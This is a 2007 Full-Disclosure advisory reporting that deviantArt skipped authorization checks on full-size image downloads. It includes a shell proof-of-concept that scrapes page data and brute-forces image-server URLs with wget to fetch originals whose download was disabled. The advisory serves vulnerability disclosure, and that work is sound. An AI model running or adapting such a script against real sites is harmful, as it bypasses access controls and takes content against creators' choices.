Security Advisory
-----------------
Title: deviantArt does not check authorization for image download
Risk Rating: High
Platforms: Any
Author: Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>
Date: 27-06-2007
Overview
--------
deviantArt does not apply any type of authorization checking for full-size
image download.
Details
-------
It is possibile to download the full-size (as uploaded) image also if the
Download button is disabled.
Proof of Concept
----------------
#!/bin/sh
# Copyright (c) 2007 Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>
URL=$1
download()
{
wget -U "" -nv "$@"
}
parse()
{
wget -U "" http://www.deviantart.com/download/"$URL"/ && exit 0
URLS=$(wget -qU "" -O - http://www.deviantart.com/deviation/"$URL"/ |
fgrep 'deviantART.pageData' | sed -e 's/^.*"fullview":
{[^}]*"\(http[^"]*\).*$/\1/' -e 's/\\//g' | awk -F / '{for (i = 0; i <= 0xF;
i++) for (j = 0; j <= 0xF; j++)
printf "http://69.28.181.52/%s/f/%s/%s/%x/%x/%s\n";, $4, $6, $7, i, j, $10}')
}
parse "$1"
echo "$URLS" | while read x; do
download "$x" && exit 0
done
Timeline
--------
Mar 26, 2007 -- Bug discovery.
Mar 27, 2007 -- Contact deviantArt, no reply.
Jun 26, 2007 -- Recontact deviantArt, still no reply.
Jun 27, 2007 -- Bug published.
Credits
-------
* Timothy Redaelli <tredaelli@xxxxxxxxxxxxx>
--
Timothy Redaelli
http://timothyredaelli.wordpress.com/
Attachment:
signature.asc
Description: This is a digitally signed message part.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/